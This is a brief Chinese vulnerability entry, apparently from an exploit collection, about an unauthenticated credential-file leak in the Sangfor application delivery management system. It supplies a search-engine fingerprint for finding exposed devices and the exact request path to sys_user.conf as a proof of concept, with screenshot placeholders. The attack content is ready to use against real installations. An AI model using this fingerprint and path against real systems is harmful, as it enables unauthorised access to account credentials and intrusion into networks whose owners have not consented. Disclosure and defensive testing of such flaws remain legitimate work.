# 深信服 应用交付管理系统 sys_user.conf 账号密码泄漏漏洞

## 漏洞描述

深信服 应用交付管理系统 文件sys_user.conf可在未授权的情况下直接访问，导致账号密码泄漏

## 漏洞影响

```
深信服 应用交付管理系统
```

## 网络测绘

```
app="SANGFOR-应用交付管理系统"
```

## 漏洞复现

登录页面

![image-20220525145113865](images/202205251451936.png)

验证POC

```
/tmp/updateme/sinfor/ad/sys/sys_user.conf
```

![image-20220525145136819](images/202205251451862.png)